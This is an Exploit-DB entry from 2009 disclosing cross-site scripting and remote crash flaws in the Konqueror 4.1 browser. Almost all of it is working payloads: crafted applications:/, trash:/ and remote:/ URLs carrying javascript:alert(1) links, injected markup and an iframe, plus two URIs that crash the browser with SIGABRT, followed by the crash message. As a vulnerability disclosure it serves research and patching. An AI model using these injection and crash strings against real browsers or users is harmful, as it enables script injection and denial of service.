Konqueror 4.1 - Cross-Site Scripting / Remote Crash

EDB-ID:

7643

CVE:

N/A

Author:

StAkeR

Type:

dos

Platform:

Multiple

Published:

2009-01-01

+-----------------------------------------------------+
| Konqueror 4.1 XSS / Remote Crash Vulnerabilities    |
+-----------------------------------------------------+
| by athos - staker[at]hotmail[dot]it                 |
| http://konqueror.kde.org                            |
+-----------------------------------------------------+
| Cross Site Scripting                                |
|                                                     |
| applications:/<a href="javascript:alert(1)">Here</a>|
| trash:/<a href="javascript:alert(1)">Here</a>       |
| remote:/<a href="javascript:alert(1)">Here</a>      |
|                                                     |
| you can write anything (example)                    |
|                                                     |
| applications:/<font size="8">THE GAME</font>        |
| applications:/<iframe src="http://milw0rm.com">     |
+-----------------------------------------------------+
| Remote Crash Vulnerabilities                        |
|                                                     |
| remote://crash:konqueror@                           |
| applications://crash:konqueror@                     |
+-----------------------------------------------------+
| Error Details...                                    |
|                                                     |
| A Fatal Error Occurred The application Konqueror    |
| (konqueror) crashed and caused the signal 6(SIGABRT)| 
| Please help us improve the software you use by      |
| filing a report at http://bugs.kde.org. Useful      |
| details include how to reproduce the error,         |
| documents that were loaded, etc.                    |
+-----------------------------------------------------+

# milw0rm.com [2009-01-01]